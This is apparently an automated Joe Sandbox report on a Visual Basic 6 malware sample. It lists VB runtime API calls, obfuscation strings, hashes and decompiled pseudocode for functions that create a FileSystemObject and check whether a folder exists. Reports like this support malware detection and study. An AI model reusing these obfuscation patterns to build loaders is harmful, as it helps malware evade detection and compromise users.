0x00420735
0x0042073b
0x0042073d
0x0042074a
0x0042076c
0x0042074c
0x0042074c
0x00420751
0x00420756
0x00420759
0x0042075f
0x00420764
0x00420764
0x00420773
0x00420780
0x00420785
0x00420786
0x00420788
0x00420793
0x00420795
0x00420797
0x004207a2
0x004207a7
0x00420815
0x0042081d
0x00420825
0x0042082d
0x00420835
0x0042083d
0x00420845
0x0042084d
0x00420852

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0041FAE5
#709.MSVBVM60(spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB1D
#588.MSVBVM60(00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB39
__vbaStrI4.MSVBVM60(00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB3F
__vbaStrMove.MSVBVM60(00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB49
__vbaStrCat.MSVBVM60(bindsaalers,00000000,00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB54
__vbaStrMove.MSVBVM60(bindsaalers,00000000,00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000,?,?,?,?,004015F6), ref: 0041FB5E
__vbaStrCat.MSVBVM60(muscularise,00000000,bindsaalers,00000000,00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000), ref: 0041FB69
__vbaStrMove.MSVBVM60(muscularise,00000000,bindsaalers,00000000,00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000), ref: 0041FB73
__vbaFreeStrList.MSVBVM60(00000002,?,?,muscularise,00000000,bindsaalers,00000000,00000000,00000020,000000C7,000000EB,spillelrernes,tunesere,000000FF,00000000), ref: 0041FB82
#669.MSVBVM60(?,?,004015F6), ref: 0041FB8A
__vbaStrMove.MSVBVM60(?,?,004015F6), ref: 0041FB94
__vbaVarDup.MSVBVM60 ref: 0041FBB9
#528.MSVBVM60(?,?), ref: 0041FBCC
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FBD8
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041FBE2
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FBF7
#575.MSVBVM60(?,00000003), ref: 0041FC21
__vbaStrVarVal.MSVBVM60(?,?,005A2ED7,005E0D92,0000012F,?), ref: 0041FC5C
__vbaStrMove.MSVBVM60 ref: 0041FC86
__vbaFreeStr.MSVBVM60 ref: 0041FC8E
__vbaFreeVarList.MSVBVM60(00000002,00000003,?), ref: 0041FCA3
__vbaStrCopy.MSVBVM60(?,?,004015F6), ref: 0041FCB3
__vbaStrCopy.MSVBVM60(?,?,004015F6), ref: 0041FCC0
__vbaStrMove.MSVBVM60 ref: 0041FD03
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041FD12
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,000006FC), ref: 0041FD4A
__vbaStrCopy.MSVBVM60 ref: 0041FDC0
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000700), ref: 0041FE05
__vbaFreeStr.MSVBVM60(00000000,00401260,0040364C,00000700), ref: 0041FE25
__vbaVarDup.MSVBVM60(00000000,00401260,0040364C,00000700), ref: 0041FE4A
#518.MSVBVM60(?,?), ref: 0041FE5D
__vbaStrCopy.MSVBVM60(?,?), ref: 0041FE6A
__vbaStrVarVal.MSVBVM60(?,?,00001F39,?,?), ref: 0041FE81
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000704), ref: 0041FEBB
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041FEE4
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0041FEFC
#696.MSVBVM60(Plaisance), ref: 0041FF43
#616.MSVBVM60(SHERIFFESS,00000031,Plaisance), ref: 0041FF56
__vbaStrMove.MSVBVM60(SHERIFFESS,00000031,Plaisance), ref: 0041FF63
__vbaStrCopy.MSVBVM60(SHERIFFESS,00000031,Plaisance), ref: 0041FF91
__vbaStrMove.MSVBVM60(Tresaarsdags,SHERIFFESS,00000031,Plaisance), ref: 0041FFAE
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000708), ref: 0041FFF6
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0042001B
__vbaLenBstrB.MSVBVM60(Unidextrality), ref: 00420028
__vbaLenBstr.MSVBVM60(parisis,Unidextrality), ref: 00420038
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,0000070C), ref: 00420097
#648.MSVBVM60(0000000A), ref: 004200CF
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000710), ref: 0042011D
__vbaFreeVar.MSVBVM60(00000000,00401260,0040364C,00000710), ref: 00420140
#517.MSVBVM60(Nonincrimination5), ref: 0042014A
__vbaStrMove.MSVBVM60(Nonincrimination5), ref: 00420154
__vbaStrMove.MSVBVM60(Nonincrimination5), ref: 0042016F
__vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004201AC
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000714), ref: 004201E4
#696.MSVBVM60(BELLBIRD), ref: 004201FD
#685.MSVBVM60(BELLBIRD), ref: 00420209
__vbaObjSet.MSVBVM60(?,00000000,BELLBIRD), ref: 00420216
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403AE8,0000001C), ref: 0042025D
__vbaStrCopy.MSVBVM60(00000000,00000000,00403AE8,0000001C), ref: 0042028B
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000718), ref: 004202F1
__vbaStrMove.MSVBVM60(00000000,00401260,0040364C,00000718), ref: 0042031B
__vbaFreeStr.MSVBVM60(00000000,00401260,0040364C,00000718), ref: 00420323
__vbaFreeObj.MSVBVM60(00000000,00401260,0040364C,00000718), ref: 0042032E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,0000071C), ref: 00420388
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000720), ref: 004203E8
#573.MSVBVM60(?,00000002), ref: 00420429
__vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 00420449
__vbaStrMove.MSVBVM60(?,?,00000002), ref: 00420453
__vbaStrCopy.MSVBVM60(?,?,00000002), ref: 00420460
#648.MSVBVM60(0000000A,?,?,00000002), ref: 00420475
__vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004204A7
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 004204C6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000724), ref: 00420524
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040364C,00000728), ref: 0042056F
__vbaVarDup.MSVBVM60(00000000,00401260,0040364C,00000728), ref: 004205C0
#629.MSVBVM60(?,?,00000041,00000002), ref: 004205DC
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,00000041,00000002), ref: 00420604
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,00000041,00000002), ref: 00420611
__vbaStrVarMove.MSVBVM60(?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,00000041,00000002), ref: 0042063A
__vbaStrMove.MSVBVM60(?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,00000041,00000002), ref: 00420644
__vbaStrMove.MSVBVM60(?,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,00000041,00000002), ref: 00420659
__vbaStrMove.MSVBVM60 ref: 00420699
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 004206AF
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 004206D5
#696.MSVBVM60(Hyrernes), ref: 004206E2
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040361C,000002B4), ref: 0042075F

Strings

premiere, xrefs: 0041FCB8
Unidextrality, xrefs: 00420023
BRAINCHILD, xrefs: 0041FDB8
MOTELS, xrefs: 0042034E
stipulr, xrefs: 0041FE2A
parisis, xrefs: 00420033
demokratismen, xrefs: 00420458
KABINETTERNES, xrefs: 0041FF20
Tresaarsdags, xrefs: 0041FFA0
tunesere, xrefs: 0041FB13
Blrendder, xrefs: 00420283
GG, xrefs: 004204CE
Improver, xrefs: 0041FF14
Plaisance, xrefs: 0041FF3E
Acoemeti9, xrefs: 0041FD80
muscularise, xrefs: 0041FB64
Hyrernes, xrefs: 004206DD
oplrende, xrefs: 0042004A
Elskovsrytmes7, xrefs: 004205A0
BELLBIRD, xrefs: 004201F8
AFSTNINGSMULIGHEDER, xrefs: 0041FB99
bindsaalers, xrefs: 0041FB4F
Trainful, xrefs: 0041FCAB
Statesboy, xrefs: 0041FF89
SINGALESERNES, xrefs: 004200E8
Enjoyable, xrefs: 00420666
], xrefs: 0042058C
spillelrernes, xrefs: 0041FB18
Genoplivningers5, xrefs: 0041FE62
SHERIFFESS, xrefs: 0041FF51
JAGER, xrefs: 0042047F
r, xrefs: 0041FD5E
Nonincrimination5, xrefs: 00420145

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Move$Free$CheckHresult$List$Copy$#696$#648Bstr$#517#518#528#573#575#588#616#629#669#685#704#709Chkstk
String ID: AFSTNINGSMULIGHEDER$Acoemeti9$BELLBIRD$BRAINCHILD$Blrendder$Elskovsrytmes7$Enjoyable$GG$Genoplivningers5$Hyrernes$Improver$JAGER$KABINETTERNES$MOTELS$Nonincrimination5$Plaisance$SHERIFFESS$SINGALESERNES$Statesboy$Trainful$Tresaarsdags$Unidextrality$]$bindsaalers$demokratismen$muscularise$oplrende$parisis$premiere$r$spillelrernes$stipulr$tunesere
API String ID: 2320483787-729022756
Opcode ID: db3f99729cc7fafa79e59f3e3e23f35f2adaf3a365a527e358ae53d8de574015
Instruction ID: 7a12501a3a65c1a88b294c268ae30a63b0c8abbea0a2c45943cf0944c869869b
Opcode Fuzzy Hash: db3f99729cc7fafa79e59f3e3e23f35f2adaf3a365a527e358ae53d8de574015
Instruction Fuzzy Hash: E072D7B5D0022CAFDB21EF51CC45BDDBBB8AF08305F1081EAE549A62A1DB745B85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00424074, Relevance: 110.6, APIs: 52, Strings: 11, Instructions: 303
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00424074(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				short _v48;
				short _v52;
				void* _v56;
				char _v60;
				char _v64;
				signed int _v68;
				char _v72;
				intOrPtr _v80;
				char _v88;
				char _v104;
				char* _v112;
				char _v120;
				char* _v128;
				char _v136;
				signed int _v144;
				char _v152;
				void* _v156;
				void* _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				intOrPtr _v180;
				char _v184;
				signed int _v188;
				signed int _v192;
				char _v196;
				signed int _v200;
				signed int _v204;
				short _t148;
				char* _t151;
				char* _t154;
				short _t155;
				short _t156;
				signed int _t163;
				signed int _t165;
				signed int _t168;
				signed int _t176;
				signed int _t181;
				intOrPtr _t239;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t239;
				L004015F0();
				_v12 = _t239;
				_v8 = 0x401508;
				L004018DE();
				L004018DE();
				L004018DE();
				_v112 =  &_v24;
				_v120 = 0x4008;
				_push(0xfc);
				_push( &_v120);
				_push( &_v88);
				L004017DC();
				_v128 = L"DIARRHOEAL";
				_v136 = 0x8008;
				_push( &_v88);
				_t148 =  &_v136;
				_push(_t148);
				L0040175E();
				_v160 = _t148;
				L00401938();
				if(_v160 != 0) {
					_push(0x493);
					_push( &_v88);
					L004016EC();
					_push( &_v88);
					L00401908();
					L0040192C();
					L00401938();
					_v112 = L"Tantalises1";
					_v120 = 8;
					L004018FC();
					_push(0xa7);
					_push( &_v88);
					_push( &_v104);
					L004016E6();
					_push( &_v104);
					L00401908();
					L0040192C();
					_push( &_v104);
					_push( &_v88);
					_push(2);
					L004018F6();
					_v112 = L"Legendernes3";
					_v120 = 8;
					L004018FC();
					_push( &_v88);
					_push( &_v104);
					L004016E0();
					_push( &_v104);
					L00401908();
					L0040192C();
					_push( &_v104);
					_push( &_v88);
					_push(2);
					L004018F6();
					_t239 = _t239 + 0x18;
				}
				_push(0);
				_push(L"Scripting.FileSystemObject");
				_push( &_v88); // executed
				L004016CE(); // executed
				_t151 =  &_v88;
				_push(_t151);
				L004016D4();
				_push(_t151);
				_push( &_v60);
				L004016DA();
				L00401938();
				_v112 = L"JENBLER";
				_v120 = 8;
				_v144 = _v144 | 0xffffffff;
				_v152 = 0x8002;
				_push(0x10);
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(1);
				_push(L"FolderExists");
				_push(_v60);
				_t154 =  &_v88;
				_push(_t154); // executed
				L004016C8(); // executed
				_push(_t154);
				_t155 =  &_v152;
				_push(_t155);
				L00401716();
				_v160 = _t155;
				L00401938();
				_t156 = _v160;
				if(_t156 != 0) {
					_v80 = 0xb4;
					_v88 = 2;
					_push( &_v88);
					_push(0x7d);
					_push(L"Resample3");
					L004016C2();
					L0040192C();
					if( *0x427544 != 0) {
						_v184 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v184 = 0x427544;
					}
					_t66 =  &_v184; // 0x427544
					_v160 =  *((intOrPtr*)( *_t66));
					_t163 =  *((intOrPtr*)( *_v160 + 0x14))(_v160,  &_v72);
					asm("fclex");
					_v164 = _t163;
					if(_v164 >= 0) {
						_v188 = _v188 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v160);
						_push(_v164);
						L0040193E();
						_v188 = _t163;
					}
					_v168 = _v72;
					_t165 = _v68;
					_v180 = _t165;
					_v68 = _v68 & 0x00000000;
					L0040192C();
					_t168 =  *((intOrPtr*)( *_v168 + 0x138))(_v168, _t165, 1);
					asm("fclex");
					_v172 = _t168;
					if(_v172 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x403c2c);
						_push(_v168);
						_push(_v172);
						L0040193E();
						_v192 = _t168;
					}
					_push( &_v68);
					_push( &_v64);
					_push(2);
					L00401914();
					L004018A2();
					L00401938();
					if( *0x427544 != 0) {
						_v196 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v196 = 0x427544;
					}
					_t103 =  &_v196; // 0x427544
					_v160 =  *((intOrPtr*)( *_t103));
					_t176 =  *((intOrPtr*)( *_v160 + 0x14))(_v160,  &_v72);
					asm("fclex");
					_v164 = _t176;
					if(_v164 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v160);
						_push(_v164);
						L0040193E();
						_v200 = _t176;
					}
					_v168 = _v72;
					_t181 =  *((intOrPtr*)( *_v168 + 0x108))(_v168,  &_v156);
					asm("fclex");
					_v172 = _t181;
					if(_v172 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x108);
						_push(0x403c2c);
						_push(_v168);
						_push(_v172);
						L0040193E();
						_v204 = _t181;
					}
					_t156 = _v156;
					_v52 = _t156;
					L004018A2();
					_push(0xb2);
					L00401806();
					L0040192C();
				}
				_v48 = 0x2d5f;
				_push(0x424557);
				L004018E4();
				L004018E4();
				L004018E4();
				L004018E4();
				L004018E4();
				L004018E4();
				L004018E4();
				L004018A2();
				return _t156;
			}

0x00424079
0x00424084
0x00424085
0x00424091
0x00424099
0x0042409c
0x004240a9
0x004240b4
0x004240c1
0x004240c9
0x004240cc
0x004240d3
0x004240db
0x004240df
0x004240e0
0x004240e5
0x004240ec
0x004240f9
0x004240fa
0x00424100
0x00424101
0x00424106
0x00424110
0x0042411e
0x00424124
0x0042412c
0x0042412d
0x00424135
0x00424136
0x00424140
0x00424148
0x0042414d
0x00424154
0x00424161
0x00424166
0x0042416e
0x00424172
0x00424173
0x0042417b
0x0042417c
0x00424186
0x0042418e
0x00424192
0x00424193
0x00424195
0x0042419d
0x004241a4
0x004241b1
0x004241b9
0x004241bd
0x004241be
0x004241c6
0x004241c7
0x004241d1
0x004241d9
0x004241dd
0x004241de
0x004241e0
0x004241e5
0x004241e5
0x004241e8
0x004241ea
0x004241f2
0x004241f3
0x004241f8
0x004241fb
0x004241fc
0x00424201
0x00424205
0x00424206
0x0042420e
0x00424213
0x0042421a
0x00424221
0x00424228
0x00424232
0x00424235
0x0042423f
0x00424240
0x00424241
0x00424242
0x00424243
0x00424245
0x0042424a
0x0042424d
0x00424250
0x00424251
0x00424259
0x0042425a
0x00424260
0x00424261
0x00424266
0x00424270
0x00424275
0x0042427e
0x00424284
0x0042428b
0x00424295
0x00424296
0x00424298
0x0042429d
0x004242a7
0x004242b3
0x004242d0
0x004242b5
0x004242b5
0x004242ba
0x004242bf
0x004242c4
0x004242c4
0x004242da
0x004242e2
0x004242fa
0x004242fd
0x004242ff
0x0042430c
0x0042432e
0x0042430e
0x0042430e
0x00424310
0x00424315
0x0042431b
0x00424321
0x00424326
0x00424326
0x00424338
0x0042433e
0x00424341
0x00424347
0x00424356
0x0042436a
0x00424370
0x00424372
0x0042437f
0x004243a4
0x00424381
0x00424381
0x00424386
0x0042438b
0x00424391
0x00424397
0x0042439c
0x0042439c
0x004243ae
0x004243b2
0x004243b3
0x004243b5
0x004243c0
0x004243c8
0x004243d4
0x004243f1
0x004243d6
0x004243d6
0x004243db
0x004243e0
0x004243e5
0x004243e5
0x004243fb
0x00424403
0x0042441b
0x0042441e
0x00424420
0x0042442d
0x0042444f
0x0042442f
0x0042442f
0x00424431
0x00424436
0x0042443c
0x00424442
0x00424447
0x00424447
0x00424459
0x00424474
0x0042447a
0x0042447c
0x00424489
0x004244ae
0x0042448b
0x0042448b
0x00424490
0x00424495
0x0042449b
0x004244a1
0x004244a6
0x004244a6
0x004244b5
0x004244bc
0x004244c3
0x004244c8
0x004244cd
0x004244d7
0x004244d7
0x004244dc
0x004244e2
0x00424519
0x00424521
0x00424529
0x00424531
0x00424539
0x00424541
0x00424549
0x00424551
0x00424556

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00424091
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004240A9
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004240B4
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004240C1
#619.MSVBVM60(?,00004008,000000FC), ref: 004240E0
__vbaVarTstNe.MSVBVM60(?,?,?,00004008,000000FC), ref: 00424101
__vbaFreeVar.MSVBVM60(?,?,?,00004008,000000FC), ref: 00424110
#698.MSVBVM60(?,00000493,?,?,?,00004008,000000FC), ref: 0042412D
__vbaStrVarMove.MSVBVM60(?,?,00000493,?,?,?,00004008,000000FC), ref: 00424136
__vbaStrMove.MSVBVM60(?,?,00000493,?,?,?,00004008,000000FC), ref: 00424140
__vbaFreeVar.MSVBVM60(?,?,00000493,?,?,?,00004008,000000FC), ref: 00424148
__vbaVarDup.MSVBVM60(?,?,00000493,?,?,?,00004008,000000FC), ref: 00424161
#617.MSVBVM60(?,?,000000A7,?,?,00000493,?,?,?,00004008,000000FC), ref: 00424173
__vbaStrVarMove.MSVBVM60(?,?,?,000000A7,?,?,00000493,?,?,?,00004008,000000FC), ref: 0042417C
__vbaStrMove.MSVBVM60(?,?,?,000000A7,?,?,00000493,?,?,?,00004008,000000FC), ref: 00424186
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,000000A7,?,?,00000493,?,?,?,00004008,000000FC), ref: 00424195
__vbaVarDup.MSVBVM60 ref: 004241B1
#524.MSVBVM60(?,?), ref: 004241BE
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 004241C7
__vbaStrMove.MSVBVM60(?,?,?), ref: 004241D1
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 004241E0
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 004241F3
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 004241FC
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 00424206
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 0042420E
__vbaChkstk.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 00424235
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001,?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,000000FC), ref: 00424251
__vbaVarTstEq.MSVBVM60(?,00000000), ref: 00424261
__vbaFreeVar.MSVBVM60(?,00000000), ref: 00424270
#628.MSVBVM60(Resample3,0000007D,00000002), ref: 0042429D
__vbaStrMove.MSVBVM60(Resample3,0000007D,00000002), ref: 004242A7
__vbaNew2.MSVBVM60(00403C1C,00427544,Resample3,0000007D,00000002), ref: 004242BF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00424321
__vbaStrMove.MSVBVM60(00000001), ref: 00424356
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000138), ref: 00424397
__vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004243B5
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 004243C0
__vbaFreeVar.MSVBVM60(?,?,00000000), ref: 004243C8
__vbaNew2.MSVBVM60(00403C1C,00427544,?,?,00000000), ref: 004243E0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00424442
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000108), ref: 004244A1
__vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000108), ref: 004244C3
#537.MSVBVM60(000000B2), ref: 004244CD
__vbaStrMove.MSVBVM60(000000B2), ref: 004244D7
__vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424519
__vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424521
__vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424529
__vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424531
__vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424539
__vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424541
__vbaFreeStr.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424549
__vbaFreeObj.MSVBVM60(00424557,?,?,?,?,?,?,?,?,004015F6), ref: 00424551

Strings

Scripting.FileSystemObject, xrefs: 004241EA
DuB, xrefs: 004243FB
JENBLER, xrefs: 00424213
DIARRHOEAL, xrefs: 004240E5
DuB, xrefs: 004242DA
Resample3, xrefs: 00424298
_-, xrefs: 004244DC
OSTMARKS, xrefs: 004240B9
Legendernes3, xrefs: 0042419D
FolderExists, xrefs: 00424245
Tantalises1, xrefs: 0042414D

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$Move$CheckHresult$CopyList$ChkstkNew2$#524#537#617#619#628#698#716AddrefCallLate
String ID: DIARRHOEAL$DuB$DuB$FolderExists$JENBLER$Legendernes3$OSTMARKS$Resample3$Scripting.FileSystemObject$Tantalises1$_-
API String ID: 3904633160-2072296172
Opcode ID: cb0d2ec364b1ab15e90161a2f652f1e677a167cdc6de50ee6dc4c60d56429940
Instruction ID: d2bef4ca7f3f76692c2376f226961e101f0c33246fcf1b1f37e832b757c4dc27
Opcode Fuzzy Hash: cb0d2ec364b1ab15e90161a2f652f1e677a167cdc6de50ee6dc4c60d56429940
Instruction Fuzzy Hash: 5BD1EB71E00228AFDB10EFA1CD56BDDB7B8AF44304F5081AAE109BB1A1DB785B49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004229C1, Relevance: 93.0, APIs: 41, Strings: 12, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E004229C1(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				char* _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v136;
				char _v144;
				short _v148;
				signed int _v160;
				void* _t85;
				short _t92;
				char* _t97;
				char* _t106;
				char* _t111;
				void* _t151;
				void* _t153;
				intOrPtr _t154;

				_t154 = _t153 - 0xc;
				 *[fs:0x0] = _t154;
				L004015F0();
				_v16 = _t154;
				_v12 = 0x401488;
				_v8 = 0;
				_t85 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015f6, _t151);
				_v48 =  *0x401480;
				L0040176A();
				L00401770();
				asm("fcomp qword [0x401478]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags < 0) {
					_push(L"Museer");
					L004018C6();
					_push(_t85);
					L00401920();
					L0040192C();
					_push(L"NATURLIGHEDER");
					_push(L"HARNISKKLDT");
					_push(L"Eyeliners");
					_push(L"subideal"); // executed
					L00401764(); // executed
					_v136 = L"Skyggesider";
					_v144 = 8;
					L004018FC();
					_push( &_v64);
					_push( &_v80);
					L00401902();
					_push( &_v80);
					L00401908();
					L0040192C();
					_push( &_v80);
					_push( &_v64);
					_push(2);
					L004018F6();
					_t154 = _t154 + 0xc;
				}
				_push(L"19:19:19");
				_push( &_v64); // executed
				L00401752(); // executed
				_push( &_v64);
				_push( &_v80);
				L00401758();
				_v88 = 0x6c;
				_v96 = 2;
				_push( &_v96);
				_push( &_v112);
				L0040189C();
				_push( &_v80);
				_t92 =  &_v112;
				_push(_t92);
				L0040175E();
				_v148 = _t92;
				_push( &_v112);
				_push( &_v80);
				_push( &_v96);
				_push( &_v64);
				_push(4);
				L004018F6();
				_t97 = _v148;
				if(_t97 != 0) {
					_push(L"hyporhined");
					L004018C6();
					_v56 = _t97;
					_v64 = 3;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v64);
					L0040174C();
					L0040192C();
					_v160 = _v48;
					_v48 = _v48 & 0x00000000;
					_v72 = _v160;
					_v80 = 8;
					_push(0x33);
					_push( &_v80);
					_push( &_v96);
					L0040181E();
					_push( &_v96);
					L00401908();
					L0040192C();
					L004018E4();
					_push( &_v96);
					_push( &_v80);
					_t106 =  &_v64;
					_push(_t106);
					_push(3);
					L004018F6();
					_push(L"Stimulationerne5");
					_push(L"SKJALDEDIGTNINGERNE");
					L00401926();
					_v88 = _t106;
					_v96 = 8;
					_v56 = 0x39;
					_v64 = 2;
					_push( &_v64);
					_push( &_v80);
					L0040189C();
					_push( &_v96);
					_push( &_v80);
					_t111 =  &_v112;
					_push(_t111);
					L00401854();
					_push(_t111);
					L00401908();
					L0040192C();
					_push( &_v112);
					_push( &_v80);
					_push( &_v96);
					_push( &_v64);
					_push(4);
					L004018F6();
					_v136 = 0x403ca0;
					_v144 = 8;
					L004018FC();
					_push( &_v64);
					_push(0x6b);
					_push( &_v80);
					L004017D0();
					_push( &_v80);
					L00401908();
					L0040192C();
					_push( &_v80);
					_t97 =  &_v64;
					_push(_t97);
					_push(2);
					L004018F6();
				}
				asm("wait");
				_push(0x422cca);
				L004018E4();
				L004018E4();
				L004018E4();
				L004018E4();
				L004018E4();
				return _t97;
			}

0x004229c4
0x004229d3
0x004229df
0x004229e7
0x004229ea
0x004229f1
0x00422a00
0x00422a0b
0x00422a0e
0x00422a13
0x00422a18
0x00422a1e
0x00422a20
0x00422a21
0x00422a27
0x00422a2c
0x00422a31
0x00422a32
0x00422a3c
0x00422a41
0x00422a46
0x00422a4b
0x00422a50
0x00422a55
0x00422a5a
0x00422a64
0x00422a77
0x00422a7f
0x00422a83
0x00422a84
0x00422a8c
0x00422a8d
0x00422a97
0x00422a9f
0x00422aa3
0x00422aa4
0x00422aa6
0x00422aab
0x00422aab
0x00422aae
